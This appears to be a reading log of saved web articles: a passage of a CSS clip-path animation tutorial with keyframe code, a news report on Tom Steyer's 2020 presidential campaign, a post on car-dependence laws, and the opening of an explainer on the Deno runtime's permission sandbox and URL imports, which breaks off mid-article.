  42.75% { clip-path: polygon(0% 0%, 100% 0%, 100% 100%, 0% 100%, 0% 25%, 25% 25%, 25% 50%, 25% 50%, 25% 50%, 25% 50%, 25% 50%, 25% 75%, 75% 75%, 75% 25%, 0% 25%); }
  57% { clip-path: polygon(0% 0%, 100% 0%, 100% 100%, 0% 100%, 0% 75%, 25% 75%, 25% 75%, 25% 75%, 25% 75%, 25% 75%, 25% 75%, 25% 75%, 75% 75%, 75% 25%, 0% 25%); }
  71.25% { clip-path: polygon(0% 0%, 100% 0%, 100% 100%, 75% 100%, 75% 75%, 75% 75%, 75% 75%, 75% 75%, 75% 75%, 75% 75%, 75% 75%, 75% 75%, 75% 75%, 75% 25%, 0% 25%); }
  85.5% { clip-path: polygon(0% 0%, 100% 0%, 100% 25%, 75% 25%, 75% 25%, 75% 25%, 75% 25%, 75% 25%, 75% 25%, 75% 25%, 75% 25%, 75% 25%, 75% 25%, 75% 25%, 0% 25%); }
  100% { clip-path: polygon(0% 0%, 0% 0%, 0% 0%, 0% 0%, 0% 0%, 0% 0%, 0% 0%, 0% 0%, 0% 25%, 0% 25%, 0% 25%, 0% 25%, 0% 25%, 0% 25%, 0% 25%); }
}

Slots

The slots transition is made of a series of vertices arranged in a pattern of vertical slots, with vertices stacked on top of each other for a complete square. The general idea is that the shape starts in the upper left and the next vertex is 14% to the right. The vertex after that is in the exact same spot, then the next is another 14% to the right, and so on until the upper-right corner is reached. This creates a series of "sections" along the top of the shape that are aligned horizontally. The second keyframe then animates every even section downward to the bottom of the element.
This gives the appearance of vertical slots wiping away their parts of the element. The third keyframe then moves the remaining sections at the top down to the bottom. Overall, the leave transition wipes away half the element in vertical slots and then the other half. The enter transition reverses the animation.

.slots-enter-active { animation: 1s slots reverse; }
.slots-leave-active { animation: 1s slots; }

@keyframes slots {
  0% { clip-path: polygon(0% 0%, 14% 0%, 14% 0%, 28% 0%, 28% 0%, 42% 0%, 42% 0%, 56% 0%, 56% 0%, 70% 0%, 70% 0%, 84% 0%, 84% 0%, 100% 0, 100% 100%, 0% 100%); }
  50% { clip-path: polygon(0% 0%, 14% 0%, 14% 100%, 28% 100%, 28% 0%, 42% 0%, 42% 100%, 56% 100%, 56% 0%, 70% 0%, 70% 100%, 84% 100%, 84% 0%, 100% 0, 100% 100%, 0% 100%); }
  100% { clip-path: polygon(0% 100%, 14% 100%, 14% 100%, 28% 100%, 28% 100%, 42% 100%, 42% 100%, 56% 100%, 56% 100%, 70% 100%, 70% 100%, 84% 100%, 84% 100%, 100% 100%, 100% 100%, 0% 100%); }
}

Shutters

The shutters transition is very similar to the slots transition above. Instead of sections along the top, it creates vertical sections placed in line with each other to make up the entire square. Starting from the upper left, the second vertex is positioned at the top, 20% to the right. The next vertex is at the same horizontal position but at the bottom of the element. The vertex after that is in the same spot, and the next one is back at the top, on top of the vertex from two steps earlier. This is repeated several times across the element until the right side is reached. If the lines of the shape were visible, they would appear as a series of vertical sections lined up horizontally across the element. During the animation, the left side of each section moves over on top of the right side. This creates a wiping effect that looks like the vertical shutters of a window. The enter transition plays the animation in reverse.
.shutters-enter-active { animation: 1s shutters reverse; }
.shutters-leave-active { animation: 1s shutters; }

@keyframes shutters {
  0% { clip-path: polygon(0% 0%, 20% 0%, 20% 100%, 20% 100%, 20% 0%, 40% 0%, 40% 100%, 40% 100%, 40% 0%, 60% 0%, 60% 100%, 60% 100%, 60% 0%, 80% 0%, 80% 100%, 80% 100%, 80% 0%, 100% 0%, 100% 100%, 0% 100%); }
  100% { clip-path: polygon(20% 0%, 20% 0%, 20% 100%, 40% 100%, 40% 0%, 40% 0%, 40% 100%, 60% 100%, 60% 0%, 60% 0%, 60% 100%, 80% 100%, 80% 0%, 80% 0%, 80% 100%, 100% 100%, 100% 0%, 100% 0%, 100% 100%, 20% 100%); }
}

Star

The star transition takes advantage of how clip-path renders positive and negative space when the lines defining the shape overlap and cross each other. The shape starts as a square with eight vertices: one in each corner and one on each side. There are only three keyframes, but there’s a large amount of movement in each one. The leave transition starts with the square and then moves each side’s vertex to the opposite side: the top vertex goes to the bottom, the bottom vertex goes to the top, and the vertices on the left and right make the same swap. This creates criss-crossing lines that form a star shape in the positive space. The final keyframe then moves the corner vertices to the center of the shape, which makes the star collapse in on itself, wiping the element away. The enter transition plays the same animation in reverse.

.star-enter-active { animation: 1s star reverse; }
.star-leave-active { animation: 1s star; }

@keyframes star {
  0% { clip-path: polygon(0% 0%, 50% 0%, 100% 0%, 100% 50%, 100% 100%, 50% 100%, 0% 100%, 0% 50%); }
  50% { clip-path: polygon(0% 0%, 50% 100%, 100% 0%, 0% 50%, 100% 100%, 50% 0%, 0% 100%, 100% 50%); }
  100% { clip-path: polygon(50% 50%, 50% 100%, 50% 50%, 0% 50%, 50% 50%, 50% 0%, 50% 50%, 100% 50%); }
}

Path shapes

OK, so we’ve looked at a lot of examples of animations using clip-path shape functions. One function we haven’t spent time with is path.
It’s perhaps the most flexible of the bunch because we can draw custom, or even multiple, shapes with it. Chris has written and even spoken on it before. So, while I created a demo for this set of examples as well, note that clip-path paths are experimental technology. As of this writing, it’s only available in Firefox 63 or higher behind the layout.css.clip-path-path.enabled flag, which can be enabled in about:config.

See the Pen Animating Clip-Path: Path Shapes by Travis Almand (@talmand) on CodePen.

This demo shows several uses of paths that are animated for transitions. The paths are the same type of paths found in SVG, and they can be lifted from a path attribute to be used in the clip-path CSS property on an element. Each of the paths in the demo was actually taken from an SVG I made by hand for each keyframe of the animations. Much like animating with the polygon shape, careful planning is required, as the number of vertices in the path cannot change; the vertices can only be manipulated.

An advantage of using paths is that a single path can consist of multiple shapes, each animated separately to allow fine-tuned control over the positive and negative space. Another interesting aspect is that path supports Bézier curves. Creating the vertices is similar to the polygon shape, but polygon doesn’t support Bézier curves. A bonus of this feature is that even the curves can be animated.

That said, a disadvantage is that a path has to be built specifically for the size of the element, because there is no percentage-based placement like we have with the other clip-path shapes. So, all the demos for this article have elements that are 200px square, and the paths in this specific demo are built for that size. Any other size or dimensions will lead to different outcomes.

Alright, enough talk. Let’s get to the examples because they’re pretty sweet.
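Since path() coordinates are absolute rather than percentage-based, adapting a path to a different element size means rewriting every coordinate. As a rough sketch (this helper and its regex-based approach are my own, not from the demo), the numbers in a path string can be scaled for a new element size:

```javascript
// Scale every number in an SVG-style path string by a factor,
// e.g. to adapt a path built for a 200px square to a 100px one.
// Note: this naive approach scales ALL numbers, which works for
// paths using only coordinate arguments (M, L, C, Z commands like
// the ones in this article); arc flags would be corrupted by it.
function scalePath(path, factor) {
  return path.replace(/-?\d+(\.\d+)?/g, (n) => {
    const scaled = parseFloat(n) * factor;
    // Trim floating-point noise while keeping fractional coordinates.
    return String(Math.round(scaled * 100) / 100);
  });
}

const original = "M0 0L200 0L200 200L0 200Z"; // full 200px square
const half = scalePath(original, 0.5); // same square for a 100px element
```

A build step or a small utility like this avoids maintaining a separate hand-drawn path for every element size.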
Iris

The iris transition consists of four small shapes that together form one complete large shape, which splits in an iris pattern, much like a sci-fi type of door. Each shape has its vertices moved and slightly rotated away from the center so that it moves off its respective side of the element. This is done with only two keyframes. The leave transition moves the shapes out of view while the enter transition reverses the effect. The path is formatted in a way that makes each shape in the path obvious: each line that starts with "M" is a new shape in the path.

.iris-enter-active { animation: 1s iris reverse; }
.iris-leave-active { animation: 1s iris; }

@keyframes iris {
  0% {
    clip-path: path('
      M103.13 100C103 32.96 135.29 -0.37 200 0L0 0C0.35 66.42 34.73 99.75 103.13 100Z
      M199.35 200C199.83 133.21 167.75 99.88 103.13 100C102.94 165.93 68.72 199.26 0.46 200L199.35 200Z
      M103.13 100C167.46 99.75 199.54 133.09 199.35 200L200 0C135.15 -0.86 102.86 32.47 103.13 100Z
      M0 200C68.63 200 103 166.67 103.13 100C34.36 100.12 -0.02 66.79 0 0L0 200Z
    ');
  }
  100% {
    clip-path: path('
      M60.85 2.56C108.17 -44.93 154.57 -45.66 200.06 0.35L58.64 -141.07C11.93 -93.85 12.67 -45.97 60.85 2.56Z
      M139.87 340.05C187.44 293.16 188.33 246.91 142.54 201.29C95.79 247.78 48.02 247.15 -0.77 199.41L139.87 340.05Z
      M201.68 61.75C247.35 107.07 246.46 153.32 199.01 200.5L340.89 59.54C295.65 13.07 249.25 13.81 201.68 61.75Z
      M-140.61 141.25C-92.08 189.78 -44.21 190.51 3.02 143.46C-45.69 94.92 -46.43 47.05 0.81 -0.17L-140.61 141.25Z
    ');
  }
}

Melt

The melt transition consists of two different animations, one each for entering and leaving. In the leave transition, the path is a square, but the top side is made up of several Bézier curves. At first, these curves are made to be completely flat; they are then animated downward to stop beyond the bottom of the shape. As these curves move downward, they are animated in different ways so that each curve adjusts differently from the others.
This gives the appearance of the element melting out of view below the bottom. The enter transition does much the same, except that the curves are on the bottom of the square. The curves start at the top, completely flat, and are then animated downward with the same curve adjustments. This gives the appearance of the second element melting into view down to the bottom.

.melt-enter-active { animation: 2s melt-enter; }
.melt-leave-active { animation: 2s melt-leave; }

@keyframes melt-enter {
  0% { clip-path: path('M0 -0.12C8.33 -8.46 16.67 -12.62 25 -12.62C37.5 -12.62 35.91 0.15 50 -0.12C64.09 -0.4 62.5 -34.5 75 -34.5C87.5 -34.5 87.17 -4.45 100 -0.12C112.83 4.2 112.71 -17.95 125 -18.28C137.29 -18.62 137.76 1.54 150.48 -0.12C163.19 -1.79 162.16 -25.12 174.54 -25.12C182.79 -25.12 191.28 -16.79 200 -0.12L200 -34.37L0 -34.37L0 -0.12Z'); }
  100% { clip-path: path('M0 199.88C8.33 270.71 16.67 306.13 25 306.13C37.5 306.13 35.91 231.4 50 231.13C64.09 230.85 62.5 284.25 75 284.25C87.5 284.25 87.17 208.05 100 212.38C112.83 216.7 112.71 300.8 125 300.47C137.29 300.13 137.76 239.04 150.48 237.38C163.19 235.71 162.16 293.63 174.54 293.63C182.79 293.63 191.28 262.38 200 199.88L200 0.13L0 0.13L0 199.88Z'); }
}

@keyframes melt-leave {
  0% { clip-path: path('M0 0C8.33 -8.33 16.67 -12.5 25 -12.5C37.5 -12.5 36.57 -0.27 50 0C63.43 0.27 62.5 -34.37 75 -34.37C87.5 -34.37 87.5 -4.01 100 0C112.5 4.01 112.38 -18.34 125 -18.34C137.62 -18.34 138.09 1.66 150.48 0C162.86 -1.66 162.16 -25 174.54 -25C182.79 -25 191.28 -16.67 200 0L200 200L0 200L0 0Z'); }
  100% { clip-path: path('M0 200C8.33 270.83 16.67 306.25 25 306.25C37.5 306.25 36.57 230.98 50 231.25C63.43 231.52 62.5 284.38 75 284.38C87.5 284.38 87.5 208.49 100 212.5C112.5 216.51 112.38 300.41 125 300.41C137.62 300.41 138.09 239.16 150.48 237.5C162.86 235.84 162.16 293.75 174.54 293.75C182.79 293.75 191.28 262.5 200 200L200 200L0 200L0 200Z'); }
}

Door

The door transition is similar to the iris transition we looked at first — it’s a "door"
effect with shapes that move independently of each other. The path is made up of four shapes: two are half-circles located at the top and bottom while the other two split the leftover positive space. This shows that not only can each shape in the path animate separately from the others, they can also be completely different shapes.

In the leave transition, each shape moves away from the center, out of view, on its own side. The top half-circle moves upward leaving a hole behind, and the bottom half-circle does the same. The left and right sides then slide away in a separate keyframe. The enter transition simply reverses the animation.

.door-enter-active { animation: 1s door reverse; }
.door-leave-active { animation: 1s door; }

@keyframes door {
  0% {
    clip-path: path('
      M0 0C16.03 0.05 32.7 0.05 50 0C50.05 27.36 74.37 50.01 100 50C99.96 89.53 100.08 136.71 100 150C70.48 149.9 50.24 175.5 50 200C31.56 199.95 14.89 199.95 0 200L0 0Z
      M200 0C183.46 -0.08 166.79 -0.08 150 0C149.95 21.45 133.25 49.82 100 50C100.04 89.53 99.92 136.71 100 150C130.29 150.29 149.95 175.69 150 200C167.94 199.7 184.6 199.7 200 200L200 0Z
      M100 50C130.83 49.81 149.67 24.31 150 0C127.86 0.07 66.69 0.07 50 0C50.26 23.17 69.36 49.81 100 50Z
      M100 150C130.83 150.19 149.67 175.69 150 200C127.86 199.93 66.69 199.93 50 200C50.26 176.83 69.36 150.19 100 150Z
    ');
  }
  50% {
    clip-path: path('
      M0 0C16.03 0.05 32.7 0.05 50 0C50.05 27.36 74.37 50.01 100 50C99.96 89.53 100.08 136.71 100 150C70.48 149.9 50.24 175.5 50 200C31.56 199.95 14.89 199.95 0 200L0 0Z
      M200 0C183.46 -0.08 166.79 -0.08 150 0C149.95 21.45 133.25 49.82 100 50C100.04 89.53 99.92 136.71 100 150C130.29 150.29 149.95 175.69 150 200C167.94 199.7 184.6 199.7 200 200L200 0Z
      M100 -6.25C130.83 -6.44 149.67 -31.94 150 -56.25C127.86 -56.18 66.69 -56.18 50 -56.25C50.26 -33.08 69.36 -6.44 100 -6.25Z
      M100 206.25C130.83 206.44 149.67 231.94 150 256.25C127.86 256.18 66.69 256.18 50 256.25C50.26 233.08 69.36 206.44 100 206.25Z
    ');
  }
  100% {
    clip-path: path('
      M-106.25 0C-90.22 0.05 -73.55 0.05 -56.25 0C-56.2 27.36 -31.88 50.01 -6.25 50C-6.29 89.53 -6.17 136.71 -6.25 150C-35.77 149.9 -56.01 175.5 -56.25 200C-74.69 199.95 -91.36 199.95 -106.25 200L-106.25 0Z
      M306.25 0C289.71 -0.08 273.04 -0.08 256.25 0C256.2 21.45 239.5 49.82 206.25 50C206.29 89.53 206.17 136.71 206.25 150C236.54 150.29 256.2 175.69 256.25 200C274.19 199.7 290.85 199.7 306.25 200L306.25 0Z
      M100 -6.25C130.83 -6.44 149.67 -31.94 150 -56.25C127.86 -56.18 66.69 -56.18 50 -56.25C50.26 -33.08 69.36 -6.44 100 -6.25Z
      M100 206.25C130.83 206.44 149.67 231.94 150 256.25C127.86 256.18 66.69 256.18 50 256.25C50.26 233.08 69.36 206.44 100 206.25Z
    ');
  }
}

X-Plus

This transition is different from most of the demos in this article, because the other demos animate the "positive" space of the clip-path for transitions. It turns out that animating the "negative" space can be difficult with the traditional clip-path shapes. It can be done with the polygon shape, but that requires careful placement of vertices to create the negative space and animate them as necessary.

This demo takes advantage of having two shapes in the path: one shape is a huge square surrounding the space of the element, and the other is a shape in the center of this square. The center shape (in this case an "x" or "+") excludes, or "carves out," negative space in the outside shape. The center shape’s vertices are then animated so that only the negative space is animated.

The leave animation starts with the center shape as a tiny "x" that grows in size until the element is wiped from view. In the enter animation, the center shape is a "+" that is already larger than the element and shrinks down to nothing.
.x-plus-enter-active { animation: 1s x-plus-enter; }
.x-plus-leave-active { animation: 1s x-plus-leave; }

@keyframes x-plus-enter {
  0% { clip-path: path('M-400 600L-400 -400L600 -400L600 600L-400 600ZM0.01 -0.02L-200 -0.02L-200 199.98L0.01 199.98L0.01 400L200.01 400L200.01 199.98L400 199.98L400 -0.02L200.01 -0.02L200.01 -200L0.01 -200L0.01 -0.02Z'); }
  100% { clip-path: path('M-400 600L-400 -400L600 -400L600 600L-400 600ZM98.33 98.33L95 98.33L95 101.67L98.33 101.67L98.33 105L101.67 105L101.67 101.67L105 101.67L105 98.33L101.67 98.33L101.67 95L98.33 95L98.33 98.33Z'); }
}

@keyframes x-plus-leave {
  0% { clip-path: path('M-400 600L-400 -400L600 -400L600 600L-400 600ZM96.79 95L95 96.79L98.2 100L95 103.2L96.79 105L100 101.79L103.2 105L105 103.2L101.79 100L105 96.79L103.2 95L100 98.2L96.79 95Z'); }
  100% { clip-path: path('M-400 600L-400 -400L600 -400L600 600L-400 600ZM-92.31 -200L-200 -92.31L-7.69 100L-200 292.31L-92.31 400L100 207.69L292.31 400L400 292.31L207.69 100L400 -92.31L292.31 -200L100 -7.69L-92.31 -200Z'); }
}

Drops

The drops transition takes advantage of the ability to have multiple shapes in the same path. The path has ten circles placed strategically inside the area of the element. They start out tiny and unseen, then are animated to a larger size over time. There are ten keyframes in the animation, and each keyframe resizes a circle while maintaining the state of any previously resized circles. This gives the appearance of circles popping in or out of view one after the other during the animation.

The leave transition shrinks the circles out of view one at a time as the negative space grows to wipe out the element. The enter transition plays the animation in reverse so that the circles enlarge and the positive space grows to reveal the new element.

The CSS used for the drops transition is rather large, so take a look at the CSS section of the CodePen demo starting with the .drops-enter-active selector.
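A path made of several circles, like the one the drops transition relies on, can be generated rather than drawn by hand. As a sketch (this generator is my own illustration of the idea, not the demo's actual code), each circle can be expressed as two 180-degree arc commands:

```javascript
// Build a clip-path path() value containing several circles, each
// drawn as two half-circle arcs. cx/cy are centers, r is the radius,
// all in pixels (path() has no percentage-based placement).
function circlesPath(circles) {
  const shapes = circles.map(({ cx, cy, r }) =>
    // Start at the circle's left edge, arc to the right edge and back.
    `M${cx - r} ${cy} a${r} ${r} 0 1 0 ${2 * r} 0 a${r} ${r} 0 1 0 ${-2 * r} 0 Z`
  );
  return `path('${shapes.join(" ")}')`;
}

// Two sample circles inside a 200px-square element; a keyframe
// generator could vary only the radii to reproduce the popping effect.
const value = circlesPath([
  { cx: 50, cy: 50, r: 20 },
  { cx: 150, cy: 120, r: 20 },
]);
```

Emitting one such string per keyframe, with only the radii changing, keeps the command count identical across keyframes, which is the same constraint the hand-made demo has to respect.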
Numbers

This transition is similar to the x-plus transition above — it uses a negative shape for the animation inside a larger positive shape. In this demo, the animated shape changes through the numbers 1, 2, and 3 until the element is wiped away or revealed. The numeric shapes were created by manipulating the vertices of each number into the shape of the next number. So, each number shape has the same number of vertices and curves, which animate correctly from one number to the next.

The leave transition starts with the shape in the center, but made to be unseen. It then animates into the shape of the first number, and the next keyframe animates to the next number, and so on. The enter transition plays the animation in reverse.

The CSS used for this one is ginormous just like the last one, so take a look at the CSS section of the CodePen demo starting with the .numbers-enter-active selector.

Hopefully this article has given you a good idea of how clip-path can be used to create flexible and powerful animations that can be both straightforward and complex. Animations can add a nice touch to a design and even help provide context when switching from one state to another. At the same time, remember to be mindful of those who may prefer to limit the amount of animation or movement, for example, by setting reduced motion preferences.

Source: Animating with Clip-Path | CSS-Tricks

    Read at 04:01 pm, Jul 11th

  • Tom Steyer Will Run for President and Plans to Spend $100 Million on His Bid - The New York Times

Tom Steyer, appearing in Des Moines in January, has focused on pushing for the impeachment of President Trump. Credit: Rachel Mummey for The New York Times

Tom Steyer, the former hedge fund investor turned impeachment activist, announced on Tuesday that he would challenge President Trump in 2020, reversing a previous decision not to enter the race. In a video announcing his campaign, Mr. Steyer positioned himself as a populist outsider, railing against corporate interests that he described as holding too much sway over the political system. “Americans are deeply disappointed and hurt by the way they’re treated by what they think is the power elite in Washington, D.C.,” Mr. Steyer said in the video. “And that goes across party lines and it goes across geography.” Included in the video were images of men who, Mr. Steyer seemed to imply, represented the excesses of corruption and greed, including Paul Manafort, Mr. Trump’s incarcerated former adviser; Bernard Madoff, the notorious Ponzi schemer; and Jeffrey Epstein, the investor who was indicted this week on charges of sex trafficking. Mr. Steyer said in an interview that he would hit the campaign trail quickly: After speaking at the liberal Netroots Nation conference in Philadelphia, he said he would campaign in the early primary state of South Carolina. He said he would unveil a plan for “structural changes” in the campaign finance system in the next few weeks and pledged to release his tax returns, though he did not set a deadline for doing so. Mr. Steyer may be a questionable vessel for a populist message, as a billionaire financier in a party increasingly defined by concern for economic inequality, and as a 62-year-old white man in a Democratic Party preoccupied with racial diversity and gender equality. Yet his candidacy instantly transformed the financial shape of the primary. Alberto Lammers, a spokesman for his campaign, said Mr.
Steyer planned to spend “at least $100 million” on the race, starting with a round of television ads in Iowa, New Hampshire and South Carolina. That figure exceeds the total fund-raising over the last three months by Joseph R. Biden Jr., Pete Buttigieg, Elizabeth Warren, Bernie Sanders and Kamala Harris — combined. A $100 million budget would represent about half the cost of Hillary Clinton’s 2016 primary campaign; most candidates who run for president spend a fraction of that sum.

Another reinvention for Steyer

Mr. Steyer’s opening message represents the latest incarnation of a figure who has played a highly unpredictable role in Democratic politics. In his announcement video, he made no mention of the issue that has consumed his political activities for the last two years — impeaching Mr. Trump — and instead borrowed from the rhetoric of leading Democratic candidates like Mr. Sanders and Ms. Warren. Among the targets in his announcement video: fossil-fuel companies that he accused of torching the planet for short-term profits, drug companies he blamed for the opioid crisis and “banks screwing people on their mortgages.” In the interview Tuesday, Mr. Steyer endorsed several policy stances that aligned him squarely, though not uniformly, with the progressive wing of his party. He said he supported decriminalizing unauthorized border crossings and expanding the size of the Supreme Court, and endorsed the creation of a government-backed health care option but not the elimination of private health insurance. People should shift toward government-backed care “by choice, not by fiat,” he said. There is little doubt that a message of government reform has broad appeal to Democrats. But Mr.
Steyer is also now on his third signature issue in little more than half a decade — after first championing climate change as a campaign topic, and then presidential impeachment — and he will have to compete with more than a handful of other Democrats trumpeting clean-government themes. Some of those candidates can be expected to push back on Mr. Steyer’s self-presentation: Mr. Sanders, for one, said on MSNBC that he liked Mr. Steyer personally but was “a bit tired of seeing billionaires trying to buy political power.” And Ms. Warren wrote on Twitter, in a clear reference to Mr. Steyer: “The Democratic primary should not be decided by billionaires, whether they’re funding Super PACs or funding themselves.” Mr. Steyer also may have to defend his own business record, as the founder of Farallon Capital, an investment firm that had more than $20 billion under its management when he left in 2012.

A Democratic version of Trump?

A wealthy outsider. An appetite for controversy. A huge personal fortune. No experience in governing. An on-the-fly decision to run for president. Sound familiar? More than any other candidate in the race, Mr. Steyer may test Democrats’ interest in nominating a Trump-like champion of their own. The comparison is imperfect: Mr. Steyer is a quirky patrician from the Bay Area who enunciates his words carefully, cares passionately about climate change and adores the novel “Lonesome Dove.” Mr. Trump is, well, none of those things. But Mr. Steyer brings to the race a contempt for traditional politicians and a sprawling confidence in himself that make him at least a faint echo of the current president. By embracing impeachment as a personal cause during the midterm elections, ignoring the entreaties of Democratic leaders like House Speaker Nancy Pelosi, Mr. Steyer claimed a role as one of his party’s chief provocateurs. It is not clear how that attitude might translate into a primary campaign.
Other Democrats have stretched and strained the boundaries of conventional party politics, but mainly with their policy ideas. Mr. Steyer, by contrast, has yet to translate his mélange of political attitudes and priorities into a consistent platform. That may have to change quickly if he is to be a serious contender. In the interview, Mr. Steyer allowed there were “some superficial comparisons” between himself and Mr. Trump, but said they would disintegrate “if you look at who I am, what I’ve done, what I stand for.” “I have been, for the last 7 to 10 years, going across America and looking citizens in the eye in almost all the states,” he said. “I have been listening to what their concerns are.”

Sharp and unpredictable elbows

Mr. Steyer has one other trait in common with Mr. Trump: He is willing to spar directly with members of his own party, for a combination of strategic and impulsive reasons. After spending years as a donor to mainstream Democratic Party leaders, Mr. Steyer veered in a sharply confrontational direction after the 2016 election, trashing the “establishment” and taking aim at individual party elders. Toying with a run for the Senate, he publicly blasted Senator Dianne Feinstein, the long-serving moderate Democrat, and endorsed a liberal challenger to oppose her. Crusading for Mr. Trump’s impeachment, Mr. Steyer used his personal advocacy group to apply pressure on powerful House committee chairmen, like Representatives Richard E. Neal of Massachusetts and Jerrold Nadler of New York. Should Mr. Steyer bring that pugilistic stance to the presidential race, it could represent a major disruption in a campaign largely defined by the candidates’ aversion to conflict. Still, even as Mr. Steyer has clashed with Democratic leaders, he has continued to underwrite the party’s campaigns and causes prolifically — a practice he said would continue during the presidential race.
His funding for voter-turnout initiatives aimed at state-level elections, he said, would continue unabated. The campaign might finally be televised Of the tens of millions of dollars already raised and spent in the Democratic primary, only a trifling amount has been used to finance television commercials. The candidates have focused instead on building voter-mobilizing organizations, and on digital advertising. Mr. Steyer has already started to change that, launching his campaign with an early-state television blitz. As an environmentalist and pro-impeachment activist, Mr. Steyer spent immense sums on television, including tens of millions of dollars’ worth of commercials during the 2018 elections demanding that Mr. Trump be removed from office. The ads featured Mr. Steyer himself in a starring role, a cardigan-clad tribune of moral outrage. With no practical limit to his spending, Mr. Steyer can be expected to deliver his message aggressively over the airwaves, potentially crowding out other competitors who lack a billionaire’s checkbook. But Mr. Steyer’s reliance on his personal wealth and traditional advertising also speaks to his flaws as a candidate: Unlike other contenders, he lacks a record of well-known accomplishments to build on. And starting so late in the race, he may have to buy the kind of stature that others — like Mr. Buttigieg and Ms. Warren — have built chiefly with their oratory and ideas. Asked why he would opt to run a campaign with his personal fortune, rather than seeking out small-donor support, Mr. Steyer deflected the question. “I think the point on this,” he said, “is going to be: who connects with the American people?” A version of this article appears in print in Section A, Page 23 of the New York edition with the headline: Billionaire Adds Name, And Lots of His Money, To Democrats’ Primary. 
Source: Tom Steyer Will Run for President and Plans to Spend $100 Million on His Bid – The New York Times

    Read at 03:55 pm, Jul 11th

  • America’s Cars Are Heavily Subsidized, Dangerous, and Mandatory

This is a fascinating & provocative article from law professor Gregory Shill: Americans Shouldn’t Have to Drive, but the Law Insists on It. The first line of the piece sets the stage: “In a country where the laws compel the use of cars, Americans are condemned to lose friends and relatives to traffic violence.” Let’s begin at the state and local level. A key player in the story of automobile supremacy is single-family-only zoning, a shadow segregation regime that is now justifiably on the defensive for outlawing duplexes and apartments in huge swaths of the country. Through these and other land-use restrictions (laws that separate residential and commercial areas or require needlessly large yards), zoning rules scatter Americans across distances and highway-like roads that are impractical or dangerous to traverse on foot. The resulting densities are also too low to sustain high-frequency public transit. Further entrenching automobile supremacy are laws that require landowners who build housing and office space to build housing for cars as well. In large part because of parking quotas, parking lots now cover more than a third of the land area of some U.S. cities; Houston is estimated to have 30 parking spaces for every resident. As UCLA urban planning professor Donald Shoup has written, this mismatch flows from legal mandates rather than market demand. Every employee who brings a car to the office essentially doubles the amount of space he takes up at work, and in urban areas his employer may be required by law to build him a $50,000 garage parking space. Cars and car ownership are massively subsidized on a state, local, and federal level and our laws and regulations have built a nation where cars are mandatory and “driving is the price of first-class citizenship”. Why are we taxing bus riders to pay rich people to buy McMansions and luxury electric SUVs? 
And this speed limit thing is just eye-poppingly fucked up: The National Transportation Safety Board has determined that speed is a top risk factor in motor vehicle crashes. Yet the most prominent way of setting and adjusting speed limits, known as the operating speed method, actually incentivizes faster driving. It calls for setting speed limits that 85 percent of drivers will obey. This method makes little provision for whether there’s a park or senior center on a street, or for people walking or biking. As a matter of law, the operating speed method is exceptional. It enables those who violate the law (speeding motorists) to rewrite it: speed limits ratchet higher until no more than 15 percent of motorists violate them. The perverse incentives are obvious. Imagine a rule saying that, once 15 percent of Americans acquired an illegal type of machine gun, that weapon would automatically become legal. Ok, this is one of those articles where I want to excerpt every paragraph…just go read the whole thing. (via @olgakhazan) Source: America’s Cars Are Heavily Subsidized, Dangerous, and Mandatory

    Read at 03:30 pm, Jul 11th

  • What's Deno, and how is it different from Node.js? - LogRocket Blog

Ryan Dahl, creator of Node.js, has spent the last year and a half working on Deno, a new runtime for JavaScript that is supposed to fix all the inherent problems of Node. Don’t get me wrong, Node is a great server-side JavaScript runtime in its own right, mostly due to its vast ecosystem and the usage of JavaScript. However, Dahl admits there are a few things he should have thought about more — security, modules, and dependencies, to name a few. In his defense, it’s not like he could envision how much the platform would grow in such a short period of time. Also, back in 2009, JavaScript was still this weird little language that everyone made fun of, and many of its features weren’t there yet. What is Deno, and what are its main features? Deno is a secure TypeScript runtime built on V8, the Google runtime engine for JavaScript. It was built with: Rust (Deno’s core was written in Rust, Node’s in C++) Tokio (the event loop written in Rust) TypeScript (Deno supports both JavaScript and TypeScript out of the box) V8 (Google’s JavaScript runtime used in Chrome and Node, among others) So let’s see what features Deno offers. Security (permissions) Among the most important of Deno’s features is its focus on security. As opposed to Node, Deno by default executes the code in a sandbox, which means the runtime has no access to: The file system The network Execution of other scripts The environment variables Let’s take a look at how the permission system works. (async () => { const encoder = new TextEncoder(); const data = encoder.encode('Hello world\n'); await Deno.writeFile('hello.txt', data); await Deno.writeFile('hello2.txt', data); })(); The script creates two text files called hello.txt and hello2.txt with a Hello world message within. The code is executed inside a sandbox, so it cannot touch the file system without explicit permission. Also note that we are using the Deno namespace instead of the fs module, as we would in Node. 
The Deno namespace provides many fundamental helper functions. By using the namespace, we are losing the browser compatibility, which will be discussed later on. When we run it by executing: deno run write-hello.ts We are prompted with the following: ⚠️Deno requests write access to "/Users/user/folder/hello.txt". Grant? [a/y/n/d (a = allow always, y = allow once, n = deny once, d = deny always)] We are actually prompted twice since each call from the sandbox must ask for permission. Of course if we chose the allow always option, we would only get asked once. If we choose the deny option, the PermissionDenied error will be thrown, and the process will be terminated since we don’t have any error-handling logic. If we execute the script with the following command: deno run --allow-write write-hello.ts There are no prompts and both files are created. Aside from the --allow-write flag for the file system, there are also --allow-net, --allow-env, and --allow-run flags to enable network requests, access the environment, and for running subprocesses, respectively. Modules Deno, just like browsers, loads modules by URLs. Many people got confused at first when they saw an import statement with a URL on the server side, but it actually makes sense — just bear with me: import { assertEquals } from "https://deno.land/std/testing/asserts.ts"; What’s the big deal with importing packages by their URLs, you may ask? The answer is simple: by using URLs, Deno packages can be distributed without a centralized registry such as npm, which recently has had a lot of problems, all of them explained here. By importing code via URL, we make it possible for package creators to host their code wherever they see fit — decentralization at its finest. No more package.json and node_modules. When we start the application, Deno downloads all the imported modules and caches them. Once they are cached, Deno will not download them again until we specifically ask for it with the --reload flag. 
There are a few important questions to be asked here: What if a website goes down? Since it’s not a centralized registry, the website that hosts the module may be taken down for many reasons. Depending on its being up during development — or, even worse, during production — is risky. As we mentioned before, Deno caches the downloaded modules. Since the cache is stored on our local disk, the creators of Deno recommend checking it in our version control system (i.e., git) and keeping it in the repository. This way, even when the website goes down, all the developers retain access to the downloaded version. Deno stores the cache in the directory specified under the $DENO_DIR environmental variable. If we don’t set the variable ourselves, it will be set to the system’s default cache directory. We can set the $DENO_DIR somewhere in our local repository and check it into the version control system. Do I have to import it by the URL all the time? Constantly typing URLs would be very tedious. Thankfully, Deno presents us with two options to avoid doing that. The first option is to re-export the imported module from a local file, like so: export { test, assertEquals } from "https://deno.land/std/testing/mod.ts"; Let’s say the file above is called local-test-utils.ts. Now, if we want to again make use of either test or assertEquals functions, we can just reference it like this: import { test, assertEquals } from './local-test-utils.ts'; So it doesn’t really matter if it’s loaded from a URL or not. 